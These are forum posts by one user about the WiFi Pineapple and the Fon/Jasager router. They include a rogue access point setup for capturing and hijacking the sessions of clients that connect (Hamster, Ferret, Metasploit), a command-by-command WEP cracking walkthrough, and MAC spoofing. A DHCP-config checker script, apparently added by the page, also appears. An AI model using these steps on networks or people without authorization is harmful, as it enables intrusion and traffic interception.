easycheese
-
Posts posted by easycheese
-
"Debricking -- Console access via Serial"
That is the first post on the forum under this topic; it will tell you what you need to know.
-
The WRT54G V7 has an Atheros AR2317 chipset with 2 MB of flash memory.
-
Yeah, I'm planning on buying a Fon+. Currently I have the Fon 2100.
-
Quoted from the Store:
"The WiFi Pineapple comes assembled as a Fon 2100 with soldered on 4 AA battery holder with on/off switch housed inside a plastic pineapple shell. The original Fon case and US power adapter as well as Hak5 and Battle Pineapple stickers are included."
-
Yeah, I agree. I'm not sure why it is set to zero either. It might be how dd-wrt is when it's installed; I have only ever played with OpenWRT, so I'm still learning all that is dd-wrt.
-
You get the Pineapple, power supply, original Fon case, stickers, battery pack connected to the Fon, and instructions on using the Fon for the first time.
-
-
I noticed that as well. I too had weak signal until I adjusted it. I believe the stock Fon antenna is only a 1.5 dB gain antenna.
-
easycheese - your tutorial looks great! thanks for putting that together.
I've been struggling off and on with setting up ICS for quite some time, and couldn't figure out what I was doing wrong.
I'm currently working with the "piranha firmware" and it seems now that my main problem is that I CAN NOT get the 'connection type' drop down box to display all the options when I select DHCP. I've tried over and over going between static and back to DHCP, but just cannot get the options to come up.
Does anyone have any insight on this? Am I missing something? Or should I just not use this firmware and go with the version being used in the tutorial?
Thanks
What options are you getting? You said you don't get all the options, right?
-
In backpack:
Acer Aspire One DualBoot WinXP/Backtrack4 w/ EDGE/UMTS Modem
Work laptop Dell 650 XP
Fon with Jasager
Nokia 770
Bluetooth GPS Puck
USB Bluetooth hub
2 Edge/UMTS Modems
cat5 cables
Screwdrivers
Batteries
Linux Pocket guide
headphones
mouse
Pen and paper
usb cables
microSD to SD converter
1 extra CellPhone
-
The pictures didn't copy over, but if you check my site you can see them.
-
This is how I have my setup; I'm using Backtrack and the Pineapple.
I have the Pineapple connected to my laptop with cat5, and have Backtrack running a DHCP server. This is the first tech article I wrote, so let me know if I'm missing something or if you try this setup and have problems. It's located at:
www.dc425.org/dhcp
1. For this I'm using DHCP3 as my DHCP server.
2. I also used Darren Kitchen's tutorial on Hak5.org for ICS.
3. I created this so I can use the setup of "evil wifi" located here.
Software needed:
1. Backtrack4
2. Dhcp3
3. A Brain
I used Darren's setup for ICS for Windows for my Fon, so I can use it on both Windows and Linux.
I did the following setup on the Fon.
Let’s assume that you have successfully installed Der Jasager as per this tutorial. Once you’ve done this go ahead and log in to Der Jasager’s webif interface using a web browser. In my case it was http://192.168.1.1/webif.html. Click the “Network” tab.
Change the drop down box next to “Connection Type” from whatever it is set to, to something like Static IP and then back to DHCP. Do this a couple of times. For some reason, in my webif interface, when I change to DHCP, not all settings are available until I do this. In any case, you’ll want to see these options:
Change the IP address to something on the same subnet as your non-Internet Connection Shared NIC (that’s “Atheros” on eniac). I changed the IP in the webif interface to 192.168.0.250.
Set the Netmask to the default class C address (255.255.255.0).
Save your configuration twice. Once using the “Save Changes” button and then again using the “Apply Changes” button.
I saved the changes this way, just to be safe. Now, remove power from the Fonera that’s running Der Jasager. Re-associate the ICS’ed NIC to its original access point. In my case, I re-associated “Alfa” to “WRT54G”. Wait a minute, and reapply power to the La Fonera. Then wait a while for the Fonera to boot and the non-ICS’ed NIC (“Atheros” in my case) to associate to “OpenWrt”.
You can now open Der Jasager’s web interface in a browser, by connecting and authenticating to the new IP address you just set up. In my case that would be http://192.168.0.250. Here’s how mine looks.
After that, let's set up the DHCP server on Backtrack.
DHCP3 How-to:
I first updated dhcp3 on Backtrack4. You don't have to do this, but if you want to, run:
sudo apt-get install dhcp3-server
Then I backed up dhcp.conf and erased the contents of the file. It's located at the following:
/etc/dhcp3/dhcp.conf
This is what my dhcp.conf file looks like:
ddns-updates off;
option T150 code 150 = string;
deny client-updates;
one-lease-per-client false;
allow bootp;
ddns-update-style none;
option domain-name-servers 208.67.222.222, 208.67.220.220;
default-lease-time 600;
max-lease-time 7200;
authoritative;
subnet 192.168.0.0 netmask 255.255.255.0 {
    interface eth0;
    range 192.168.0.2 192.168.0.254;
    default-lease-time 600;
    max-lease-time 7200;
    option subnet-mask 255.255.255.0;
    option broadcast-address 192.168.0.255;
    option routers 192.168.0.2;
    option domain-name-servers 208.67.222.222, 208.67.220.220;
}
Then I edited /etc/network/interfaces; under auto eth0 this is what I have (the network and broadcast values must be the /24's network address and broadcast address, and the keywords are lowercase):
auto eth0
iface eth0 inet static
    address 192.168.0.1
    network 192.168.0.0
    netmask 255.255.255.0
    broadcast 192.168.0.255
Then you must tell the dhcp3-server which adapter to listen on. This is set in /etc/default/dhcp3-server. Edit that file and under INTERFACES add eth0. It should look like the following:
INTERFACES="eth0"
Next I set the IP address of eth0:
sudo ifconfig eth0 inet 192.168.0.2
Next you have to allow all connections out through iptables to the world. Depending on which adapter is connected to the internet, you will have to change the interface in the command. In my case the connection goes out through my wireless, so I use wlan0.
sudo iptables -t nat -A POSTROUTING -o wlan0 -j MASQUERADE
You also need to allow ip forwarding:
echo 1 > /proc/sys/net/ipv4/ip_forward
Now you need to connect the Fon to your laptop. Once connected, start the DHCP server by entering the following:
sudo /etc/init.d/dhcp3-server start
Once started, you can check for DHCP leases with the following:
cat /var/lib/dhcp3/dhcpd.leases
Now you can start up Hamster and Ferret. Also you can run an Apache server with a fake router page, or whatever you want.
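The dhcp.conf above hands out 192.168.0.2 through 192.168.0.254 while also naming 192.168.0.2 as the gateway, and the interfaces file gives eth0 192.168.0.1 while the later ifconfig line sets it to 192.168.0.2. A small consistency check catches that kind of mismatch before the server is started. The script below is an added example for this page, not code from easycheese's tutorial or from the ISC dhcpd project; it parses the `subnet { ... }` block (a constructed copy of the one above), and the server address and corrected values it compares against are assumptions taken from the post.

```python
"""Sanity-check ISC dhcpd subnet declarations before handing out leases."""
import ipaddress
import re

# Constructed copy of the subnet block quoted in the post above; not a live config file.
SAMPLE_DHCPD_CONF = """
authoritative;
subnet 192.168.0.0 netmask 255.255.255.0 {
  interface eth0;
  range 192.168.0.2 192.168.0.254;
  default-lease-time 600;
  max-lease-time 7200;
  option subnet-mask 255.255.255.0;
  option broadcast-address 192.168.0.255;
  option routers 192.168.0.2;
  option domain-name-servers 208.67.222.222, 208.67.220.220;
}
"""

# Constructed corrected variant (assumption): gateway at .1, dynamic pool starting above it.
FIXED_DHCPD_CONF = SAMPLE_DHCPD_CONF.replace(
    "range 192.168.0.2 192.168.0.254;", "range 192.168.0.10 192.168.0.254;"
).replace("option routers 192.168.0.2;", "option routers 192.168.0.1;")

_SUBNET_RE = re.compile(r"subnet\s+(\S+)\s+netmask\s+(\S+)\s*\{(.*?)\}", re.S)


def parse_subnets(text):
    """Return one dict per `subnet ... { }` block: network, range, options, interface."""
    subnets = []
    for net, mask, body in _SUBNET_RE.findall(text):
        entry = {
            "network": ipaddress.ip_network(f"{net}/{mask}", strict=False),
            "range": None,
            "options": {},
            "interface": None,
        }
        for stmt in body.split(";"):
            parts = stmt.split()
            if not parts:
                continue
            if parts[0] == "range":
                # `range [dynamic-bootp] low high;` - drop the optional keyword
                addrs = [p for p in parts[1:] if p != "dynamic-bootp"]
                entry["range"] = (ipaddress.ip_address(addrs[0]),
                                  ipaddress.ip_address(addrs[-1]))
            elif parts[0] == "option" and len(parts) >= 3:
                # option values may be comma separated, e.g. two DNS servers
                entry["options"][parts[1]] = [v.rstrip(",") for v in parts[2:]]
            elif parts[0] == "interface":
                entry["interface"] = parts[1]
        subnets.append(entry)
    return subnets


def check_subnet(entry, server_ip=None):
    """Return human-readable findings; an empty list means the block is consistent."""
    findings = []
    net = entry["network"]
    if entry["range"] is None:
        return ["no range statement; dhcpd will not offer dynamic leases"]
    lo, hi = entry["range"]
    pool = f"{lo}-{hi}"
    if lo not in net or hi not in net:
        findings.append(f"range {pool} is not inside {net}")
    if lo > hi:
        findings.append(f"range {pool} has start after end")
    for r in entry["options"].get("routers", []):
        r_ip = ipaddress.ip_address(r)
        if r_ip not in net:
            findings.append(f"router {r} is not inside {net}")
        elif lo <= r_ip <= hi:
            # dhcpd may lease the gateway's own address to a client
            findings.append(f"router {r} lies inside dynamic range {pool}")
    bcast = entry["options"].get("broadcast-address")
    if bcast and ipaddress.ip_address(bcast[0]) != net.broadcast_address:
        findings.append(f"broadcast-address {bcast[0]} should be {net.broadcast_address}")
    mask = entry["options"].get("subnet-mask")
    if mask and ipaddress.ip_address(mask[0]) != net.netmask:
        findings.append(f"subnet-mask {mask[0]} should be {net.netmask}")
    if server_ip is not None:
        s_ip = ipaddress.ip_address(server_ip)
        if s_ip not in net:
            findings.append(f"server address {server_ip} is not inside {net}")
        elif lo <= s_ip <= hi:
            findings.append(f"server address {server_ip} lies inside dynamic range {pool}")
    if entry["interface"] is None:
        findings.append("no interface statement; dhcpd may bind to the wrong NIC")
    return findings


if __name__ == "__main__":
    # server addresses are the ones the post assigns to eth0 (assumed)
    for label, conf, srv in (("as posted", SAMPLE_DHCPD_CONF, "192.168.0.2"),
                             ("corrected", FIXED_DHCPD_CONF, "192.168.0.1")):
        for sub in parse_subnets(conf):
            print(label, sub["network"], check_subnet(sub, server_ip=srv) or "OK")
```

Run against the block as posted, the check reports that the router address 192.168.0.2 sits inside the dynamic pool, and, if eth0 is set to 192.168.0.2 as the ifconfig line does, that the server's own address does too; the corrected variant passes cleanly.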
-
If you're using Backtrack,
you can use the commands:
1. ifconfig [interface] down
2. sudo iwconfig [interface] nw ether [MAC Address]
3. ifconfig [interface] up
Command 2 will look something like:
sudo iwconfig wlan0 nw ether 00:11:22:33:44:55
-
I have found that there must be some setting in the router to stop replying to the injected packets. I never got around to figuring it out, but the occasional WEP AP wasn't crackable unless you just collected packets. Not too sure what the setting would be; it may even be a factory-set setting.
Yeah, like I was saying, my Orinoco AP2000 AP will only let me inject 15 packets a second. Anything more than that and it just rejects the traffic from my laptop. I would try and lower the injection rate. Let's say you used the fragment attack. Then to replay the packet you forged using packetforge, you use "aireplay-ng -2 -x 150 -r packet [interface]".
-x lets you say how many packets a second you inject.
I would try and lower the number until you find how much you can inject before your AP stops allowing you to inject.
-
What is the command to start DHCP?
-
This is my airbase-ng script http://www.dc425.org/softap
-
I don't have first-hand experience, but the ones I have used worked well.
-
yep, did it all the way you're saying except the -x 150 on the -2 aireplay-ng. I've tried all sorts of different attacks on my wifi router. The -9 injection test comes out working, and the injection thinks it's working but it's not seeming to really do anything. It looks like it's a common problem with the ipw3945 driver on the 3945abg chipset. I found it all over the remote exploit forums. I've also been living in the remote exploit IRC. I'm looking for an ipwraw download now, even though I get my alfa on Friday.
Let me know how it goes. The `-x 150` is how many packets you inject every second. I found that most APs work best with injecting 150 a second. Now that being said, I have an Orinoco AP2000 that will only let me inject 20 a second before it deauths me and will not let me fake auth.
-
I sat at home on Saturday and set up a router to crack the WEP on my wifi router, a Linksys WRT310N, and none of the injections were working. I eventually was able to get enough IVs to get the hex, but it took 6 hours of sniffing and setting 2 machines to continually ping invalid IP addresses. I tried every type of injection aireplay-ng had, changed my card's MAC address to simulate another machine, and everything. Nothing seemed to make the IVs go up any faster. I'm using a Centrino-based laptop, so Intel wifi, which is supported, and I was right next to the AP. I was wondering if I'm missing some fundamental part of this. I went through tons of video and blogged tutorials trying to make the injection work, but it just never seemed to work.
What wifi card are you using?
Did you try and test the injection percentage? `aireplay-ng -9 interface`
That should tell you injection is working and a percentage of how well it was able to inject. Also, what attack are you running? I have the best luck with packet fragmentation; I believe that's option 5.
I usually set up airodump on the AP:
airodump-ng -c 11 -bssid 00:11:22:33:44:55 -w /tmp/owned interface
then fake auth on the router:
aireplay-ng -1 30 -a {MAC of AP} interface
then:
aireplay-ng -5 -b {MAC of AP} interface
After it finds a packet and writes the fragmentation file to your drive, run packetforge to create a packet to replay back to the AP.
packetforge -0 -a {MAC of AP} -h {MAC OF YOUR CARD} -k 255.255.255.255 -l 255.255.255.255 -y {The fragmentation file that was created; should end with .xor} -w packet
`-w is writing the packet to replay back to the AP`
Then use aireplay again to replay "packet" to the AP:
aireplay-ng -2 -x 150 -r packet interface
After gathering some IVs, run aircrack for some good ol' fun:
aircrack-ng capturefile
*remember only test your own AP*
Problem: Connecting Fon+Jasager to Metasploit+Karma
in WiFi Pineapples Mark I, II, III
My site talks you through setting up Backtrack4 and the Fon for this very purpose: www.dc425.org/dhcp . Though I know on that site it states that you need a crossover cable, I am not using one and it works fine for me.
This setup will get internet sharing working so those connected to the Fon will be able to browse, and all traffic will come over the wire through your laptop and out your wireless. DHCP is shown on the leases list, and in my tutorial it shows you how to see when a new lease is added.
Also, once connected you just point Metasploit at eth0 and you will be able to target those that connect. I hope it helps; let me know if you have any other questions.
I can also make a quick tutorial on using Metasploit with this setup if you want.